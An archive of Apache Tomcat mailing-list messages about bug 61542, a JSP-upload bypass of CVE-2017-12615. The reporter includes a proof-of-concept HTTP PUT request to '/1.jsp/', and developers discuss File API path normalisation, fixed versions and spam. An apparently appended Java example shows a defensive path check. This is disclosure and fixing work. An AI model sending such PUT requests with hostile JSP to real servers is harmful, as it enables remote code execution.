Posted to dev@tomcat.apache.org by bu...@apache.org on 2017/09/20 06:38:18 UTC
[Bug 61542] New: Apache Tomcat Remote Code Execution via JSP Upload bypass for CVE-2017-12615
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Bug ID: 61542
Summary: Apache Tomcat Remote Code Execution via JSP Upload bypass for CVE-2017-12615
Product: Tomcat 7
Version: 7.0.81
Hardware: PC
Status: NEW
Severity: normal
Priority: P2
Component: Servlet & JSP API
Assignee: dev@tomcat.apache.org
Reporter: shengqi158@gmail.com
Target Milestone: ---
Description:
When running on Windows with HTTP PUTs enabled (e.g. via setting the
readonly initialisation parameter of the Default to false) it was
possible to upload a JSP file to the server via a specially crafted
request. This JSP could then be requested and any code it contained
would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>
It is the bypass for CVE-2017-12615.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #5 from Mark Thomas <ma...@apache.org> ---
Maybe a better check would be that, given the path will already have been
normalised, if the absolute path ends with the given name.
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by Mark Thomas <ma...@apache.org>.
On 17/01/2020 14:25, Christopher Schultz wrote:
> Mark,
>
> On 1/16/20 8:11 AM, Mark Thomas wrote:
>> On 16/01/2020 12:00, bugzilla@apache.org wrote:
>>> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>>>
>>> --- Comment #13 from Sam <ge...@gmail.com> ---
>
>> This idiot has been blocked from BZ for spam and the spam comment
>> deleted.
>
> The previous comment also appears to be the same kind of spam.
Thanks. That idiot has been blocked too and their spam comments deleted.
Mark
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by Christopher Schultz <ch...@christopherschultz.net>.
Mark,
On 1/16/20 8:11 AM, Mark Thomas wrote:
> On 16/01/2020 12:00, bugzilla@apache.org wrote:
>> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>>
>> --- Comment #13 from Sam <ge...@gmail.com> ---
>
> This idiot has been blocked from BZ for spam and the spam comment
> deleted.
The previous comment also appears to be the same kind of spam.
-chris
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by Mark Thomas <ma...@apache.org>.
On 16/01/2020 12:00, bugzilla@apache.org wrote:
> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>
> --- Comment #13 from Sam <ge...@gmail.com> ---
This idiot has been blocked from BZ for spam and the spam comment deleted.
Mark
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #13 from Sam <ge...@gmail.com> ---
Hello Mark, is this issue fixed?
Best regards,
Sam.
https://getpeople.io
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #7 from Peter Stöckli <pe...@alphabot.com> ---
Isn't the mere existence of the readonly parameter also part of the problem?
https://tomcat.apache.org/tomcat-7.0-doc/default-servlet.html
It is currently documented as "Is this context "read only", so HTTP commands
like PUT and DELETE are rejected? [true]"
But it holds more "surprises". IMHO this parameter should NEVER be set to
false. Maybe it can be removed or the documentation of this parameter can be
improved?
[Bug 61542] none
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
xxlegend <sh...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apache Tomcat Remote Code |none
|Execution via JSP Upload |
|bypass for CVE-2017-12615 |
OS| |All
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #3 from Mark Thomas <ma...@apache.org> ---
The File API certainly isn't helping.
When a file named '/test.jsp' exists '/test.jsp/' -> '/test.jsp' is surprising.
Less so when it doesn't exist because it could be referring to a directory and
both forms are valid for a directory.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
ann chriss <an...@yahoo.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
OS| |All
--- Comment #13 from ann chriss <an...@yahoo.com> ---
thanks
[Bug 61542] none
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #1 from Mark Thomas <ma...@apache.org> ---
This additional issue has been confirmed and CVE-2017-12617 has been allocated.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Guillermo Grandes <gu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |guillermo.grandes@gmail.com
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Mark Thomas <ma...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution|--- |FIXED
--- Comment #11 from Mark Thomas <ma...@apache.org> ---
Fixed in:
- trunk for 9.0.0 onwards
- 8.5.x for 8.5.22 onwards
- 8.0.x for 8.0.47 onwards
- 7.0.x for 7.0.82 onwards
I'm on the fence regarding the suggested documentation change. If a sysadmin
doesn't understand what enabling HTTP PUT and/or DELETE means I don't think any
realistic amount of documentation is going to result in a correctly secured
Tomcat instance.
Maybe what we need is a link to the security page from every setting called out
in the security page. Something to ponder / discuss on the dev@ list.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #14 from Mike Smith <rs...@gmail.com> ---
Hello Mark, has this issue been fixed already? Or any source? Thanks
Mike S.
http://www.insolvencyhelpline.co.uk/
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #6 from Mark Thomas <ma...@apache.org> ---
Nope. That will fail for directories where the trailing '/' is provided since
it will have been removed from the absolute and canonical paths.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #8 from Remy Maucherat <re...@apache.org> ---
(In reply to Peter Stöckli from comment #7)
> Isn't the mere existence of the readonly parameter also part of the problem?
>
> https://tomcat.apache.org/tomcat-7.0-doc/default-servlet.html
> It is currently documented as "Is this context "read only", so HTTP commands
> like PUT and DELETE are rejected? [true]"
>
> But it holds more "surprises". IMHO this parameter should NEVER be set to
> false. Maybe it can be removed or the documentation of this parameter can be
> improved?
Have you ever heard of WebDAV? Obviously if we were writing Tomcat today, we
would never bother implementing it. Also obviously, nobody running a public
server should enable it, secured or not. But it's not going to be removed
either.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #4 from Remy Maucherat <re...@apache.org> ---
Well, every time there's surprising normalization, it causes security issues so
it's a big API mistake :) The normalization of the input path should only
happen for getCanonicalPath, that's the whole point.
Of course, I probably knew about this behavior a while ago then since there's
the '/' check for get. On the plus side the issue is not that serious (readonly
needed) so it's not the end of the world.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Remy Maucherat <re...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|none |Apache Tomcat Remote Code
| |Execution via JSP Upload
| |bypass
--- Comment #2 from Remy Maucherat <re...@apache.org> ---
Hum, actually this looks like a File API issue. With the (correct) /1.jsp/ path
input, (new File(name)).getPath() just strips the trailing '/', and of course
getAbsolutePath, which is used for the safety net check, also does it. There's
a problem there.
Restoring the BZ name since it's pointless.
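The java.io.File behaviour that Remy (comment #2) and Mark (comments #3, #5 and #6) describe, shown in runnable form as an added example that is not Tomcat's own code: the trailing '/' disappears from getPath() and getAbsolutePath(), the "absolute path ends with the requested name" idea fails for a directory requested as 'docs/', and a write-path check has to look at the raw request path before the File API normalises it. The temporary web root, the file names and the resolveForWrite helper are assumptions made for this demo.

```java
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

// Added illustration, not Tomcat's code. The web root, the sample files and
// the resolveForWrite helper are assumptions made for this demo.
public class TrailingSlashCheck {

    /**
     * Resolves a (URL-decoded) request path against the web root for a write
     * such as PUT. Returns null when the write must be refused.
     */
    static File resolveForWrite(File webRoot, String requestPath) throws IOException {
        // Only the raw request path still carries the trailing '/': getPath(),
        // getAbsolutePath() and getCanonicalPath() all strip it.
        boolean requestedAsDirectory = requestPath.endsWith("/");

        File target = new File(webRoot, requestPath);

        // Containment check on canonical paths, so that '..' segments and
        // symlinks cannot point outside the web root.
        String rootCanonical = webRoot.getCanonicalPath() + File.separator;
        if (!target.getCanonicalPath().startsWith(rootCanonical)) {
            return null;
        }

        // A name ending in '/' denotes a directory. If it resolves to a regular
        // file (the 'test.jsp/' -> 'test.jsp' surprise), or to nothing at all
        // (a file would be created under a directory-style name), refuse it.
        if (requestedAsDirectory && !target.isDirectory()) {
            return null;
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample web root: one JSP file and one directory.
        Path root = Files.createTempDirectory("webroot");
        Files.write(root.resolve("test.jsp"), "<%-- sample --%>".getBytes(StandardCharsets.UTF_8));
        Files.createDirectory(root.resolve("docs"));
        File webRoot = root.toFile();

        // 1. The File API surprise: the trailing '/' vanishes from the path and
        //    the existing regular file is matched.
        File f = new File(webRoot, "/test.jsp/");
        System.out.println("getPath() for '/test.jsp/': " + f.getPath());
        System.out.println("isFile() for '/test.jsp/': " + f.isFile());

        // 2. Why "absolute path ends with the requested name" is not enough:
        //    a directory requested as '/docs/' never ends with that name.
        File d = new File(webRoot, "/docs/");
        System.out.println("absolute path of '/docs/' ends with 'docs" + File.separator + "': "
                + d.getAbsolutePath().endsWith("docs" + File.separator));

        // 3. The trailing-slash aware check applied to a few write requests.
        String[] requests = { "/test.jsp/", "/new.jsp", "/docs/", "/../outside.jsp" };
        for (String request : requests) {
            File resolved = resolveForWrite(webRoot, request);
            System.out.println("PUT " + request + " -> "
                    + (resolved == null ? "refused" : "allowed at " + resolved.getPath()));
        }
    }
}
```

Compile and run with `javac TrailingSlashCheck.java && java TrailingSlashCheck`. The design point is the one Remy makes in comment #4: normalisation belongs in getCanonicalPath, so the decision about whether the client asked for a file or a directory is taken from the request string, and the canonical path is used only for the containment check.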
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #10 from Peter Stöckli <pe...@alphabot.com> ---
Created attachment 35361
--> https://bz.apache.org/bugzilla/attachment.cgi?id=35361&action=edit
proposal to improve doc of the readonly flag
First of all: your work is greatly appreciated!
And I didn't know that Tomcat is also widely used as WebDAV server. So it makes
sense to keep that option.
Attached is a patch that could help improve the documentation of the readonly
flag.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #9 from Mark Thomas <ma...@apache.org> ---
Indeed. Lots of folks run Tomcat with WebDAV on internal sites. Hard-coding
readonly to true is simply not an option.
Regarding better documentation, patches welcome.
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #12 from Castro B <ca...@gmx.com> ---
Hello Mark, has this issue been fixed already? Or any source? Thanks
Castro B.
http://buywebtrafficexperts.com/
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
cailei <ca...@infosec.com.cn> changed:
What |Removed |Added
----------------------------------------------------------------------------
Component|Servlet & JSP API |Catalina
Version|7.0.81 |9.0.0.M22
OS|All |Windows Server 2012 R2
Product|Tomcat 7 |Tomcat 9
Target Milestone|--- |-----
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
xing <ga...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Component|Catalina |Catalina
Version|9.0.0.M22 |8.5.15
Target Milestone|----- |----
Product|Tomcat 9 |Tomcat 8